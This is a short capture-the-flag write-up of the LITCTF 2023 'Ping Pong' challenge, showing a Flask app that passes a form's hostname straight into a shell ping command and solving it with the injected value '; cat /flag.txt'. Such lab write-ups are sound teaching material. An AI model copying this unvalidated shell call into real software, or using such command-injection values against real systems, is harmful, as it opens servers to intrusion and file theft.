2023 LITCTF - Ping Pong

August 8, 2023 less than 1 minute read

Overview

387 solves / 114 points
Author: Ethan

Description

I made this cool website where you can ping other websites!

Attached

This is pingpong.py file

from flask import Flask, render_template, redirect, request
import os

app = Flask(__name__)

@app.route('/', methods = ['GET','POST'])
def index():
    output = None
    if request.method == 'POST':
        hostname = request.form['hostname']
        cmd = "ping -c 3 " + hostname
        output = os.popen(cmd).read()

    return render_template('index.html', output=output)

Analyzation

When receiving hostname from the POST method, the command will be executed without validating the data from hostname

cmd = "ping -c 3 " + hostname
output = os.popen(cmd).read()

This leads to command injection.

Solution

Send POST request with the hostname value

; cat /flag.txt

The flag is

LITCTF{I_sh0uld_b3_m0r3_c4r3ful}

Share on

Twitter Facebook LinkedIn

encuetee

2023 LITCTF - Ping Pong

Overview

Description

Attached

Analyzation

Solution

Share on

You may also enjoy

2024 BlackHat MEA CTF Qualification - watermelon

2024 BlackHat MEA CTF Qualification - free flag

2024 LACTF - terms-and-conditions

2024 LACTF - penguin-login